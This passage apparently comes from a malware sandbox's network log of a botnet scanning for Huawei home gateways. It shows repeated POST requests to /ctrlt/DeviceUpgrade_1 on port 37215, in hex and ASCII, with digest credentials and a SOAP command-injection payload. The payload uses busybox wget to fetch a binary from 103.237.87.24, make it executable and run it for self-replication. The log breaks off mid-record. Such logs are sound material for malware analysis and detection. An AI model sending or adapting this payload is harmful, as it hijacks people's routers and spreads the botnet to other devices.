                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1903192.168.2.1347700166.227.214.21837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.550786972 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1904192.168.2.1356354197.253.83.18837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.550797939 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1905192.168.2.133476441.66.248.4737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.551140070 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1906192.168.2.1340750157.127.192.2337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.551176071 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1907192.168.2.1358824159.105.164.24537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.551229954 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1908192.168.2.1332866169.137.221.17237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.551279068 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1909192.168.2.135137441.254.191.16437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.551285028 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1910192.168.2.135443044.163.100.2837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.551290035 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1911192.168.2.1350126197.43.49.9337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.551296949 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1912192.168.2.135808836.126.7.14237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.551347971 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 